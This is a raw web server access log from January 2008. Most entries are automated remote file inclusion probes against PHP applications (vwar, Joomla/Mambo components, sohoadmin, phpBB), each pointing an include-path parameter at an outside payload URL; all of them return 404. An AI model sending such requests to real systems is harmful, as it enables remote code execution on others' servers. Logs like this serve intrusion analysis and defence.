69.10.135.176 - - [22/Jan/2008:18:17:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:17:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:18:19 -0800] "GET /logs/access.log//sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:18:53 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:19:53 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:18:20:16 -0800] "GET /logs/access.log/skin/zero_vote/login.php?dir=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:18:20:17 -0800] "GET /logs/skin/zero_vote/login.php?dir=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:18:21:15 -0800] "GET /bikes/CreSTOC07/ HTTP/1.1" 200 15296 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
85.214.110.109 - - [22/Jan/2008:18:22:25 -0800] "GET /logs/access_071229.log/skin/zero_vote/login.php?dir=http://gcd.jveuger.nl/site/bo.do??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.75.212.136 - - [22/Jan/2008:18:22:30 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ministerioelshadday.com.br/language/portugues.do.brasil/envirfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:18:24:49 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:18:24:49 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
74.208.16.29 - - [22/Jan/2008:18:24:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
80.247.71.13 - - [22/Jan/2008:18:25:16 -0800] "GET /logs/access_071229.log//login.php?dir=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.247.71.13 - - [22/Jan/2008:18:25:16 -0800] "GET /logs//login.php?dir=http://dominic888.no-ip.info:8081/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
121.173.130.137 - - [22/Jan/2008:18:27:04 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:27:05 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:27:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:27:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:27:21 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
24.23.164.127 - - [22/Jan/2008:18:29:14 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
24.23.164.127 - - [22/Jan/2008:18:29:14 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:25 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:30 -0800] "GET /logs/access_071222.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:46 -0800] "GET /logs/access_071214.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:46 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:29:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:30:01 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:18:31:03 -0800] "GET /logs/access_080118.log HTTP/1.1" 200 561818 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
208.53.183.183 - - [22/Jan/2008:18:31:19 -0800] "GET /logs/access.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ccking.110mb.com/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [22/Jan/2008:18:31:19 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ccking.110mb.com/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.53.183.183 - - [22/Jan/2008:18:31:19 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ccking.110mb.com/date.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:31:25 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:31:25 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:31:25 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:31:32 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:31:34 -0800] "GET /logs/access_071222.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:32:39 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:32:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:32:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:18:32:57 -0800] "GET /logs/access_080117.log HTTP/1.1" 200 670488 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:33:06 -0800] "GET /logs/access_071222.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:33:36 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:33:36 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:33:36 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:33:49 -0800] "GET /logs/access_071222.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:33:59 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:34:00 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:34:00 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.28.106.195 - - [22/Jan/2008:18:34:09 -0800] "GET /logs/access_071225.log/index.php?body=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.249.70.19 - - [22/Jan/2008:18:35:05 -0800] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.dmulk.com"
193.138.204.132 - - [22/Jan/2008:18:35:50 -0800] "GET /logs/classes/adodbt/sql.php?classes_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
193.138.204.132 - - [22/Jan/2008:18:35:50 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.69.176.40 - - [22/Jan/2008:18:36:31 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
70.85.98.2 - - [22/Jan/2008:18:36:37 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:36:47 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:18:37:28 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
72.55.156.153 - - [22/Jan/2008:18:37:28 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://fantastiki.net/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
204.202.2.203 - - [22/Jan/2008:18:37:45 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.202.2.203 - - [22/Jan/2008:18:37:45 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.200.80.252 - - [22/Jan/2008:18:38:15 -0800] "GET /logs/index.php?mode=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.200.80.252 - - [22/Jan/2008:18:38:15 -0800] "GET /index.php?mode=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:38:28 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:38:28 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:38:28 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:39:23 -0800] "GET /logs/access_071225.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:40:30 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:40:30 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:40:30 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:40:35 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:40:35 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:40:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
121.173.130.137 - - [22/Jan/2008:18:42:21 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/config-global.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.98.2 - - [22/Jan/2008:18:42:21 -0800] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:42 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:42 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:42 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:46 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:46 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:42:46 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:43:04 -0800] "GET /logs/access_071228.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:43:04 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.126 - - [22/Jan/2008:18:43:04 -0800] "GET /megumi/ HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:19 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:19 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:26 -0800] "GET /logs/access_071126.log//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:26 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.160.16.3 - - [22/Jan/2008:18:43:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.73.190.200 - - [22/Jan/2008:18:43:36 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
69.73.190.200 - - [22/Jan/2008:18:43:36 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
195.242.208.120 - - [22/Jan/2008:18:43:42 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://nkdb.org/AsaMall/makeup/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:44:09 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:44:09 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:44:09 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.111.193.18 - - [22/Jan/2008:18:44:19 -0800] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
207.111.193.18 - - [22/Jan/2008:18:44:19 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:45:06 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.160.78.135 - - [22/Jan/2008:18:45:16 -0800] "GET //modules/Forums/admin/index.php?phpbb_root_path=http://www.blackgovernment.de/help/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
217.160.78.135 - - [22/Jan/2008:18:45:16 -0800] "GET /logs//modules/Forums/admin/index.php?phpbb_root_path=http://www.blackgovernment.de/help/css/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
88.151.100.136 - - [22/Jan/2008:18:45:43 -0800] "GET //modules/My_eGallery/index.php?basepath=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
88.151.100.136 - - [22/Jan/2008:18:45:43 -0800] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.seucu.us/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:45:44 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:45:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:45:45 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:46:02 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:46:02 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.90.135.132 - - [22/Jan/2008:18:46:02 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xexmox/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:46:17 -0800] "GET /logs/access.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:46:17 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:46:17 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.135.176 - - [22/Jan/2008:18:47:14 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.moas.com.br/images/www.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.38.58.151 - - [22/Jan/2008:18:47:43 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.22.125.219/r0x/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
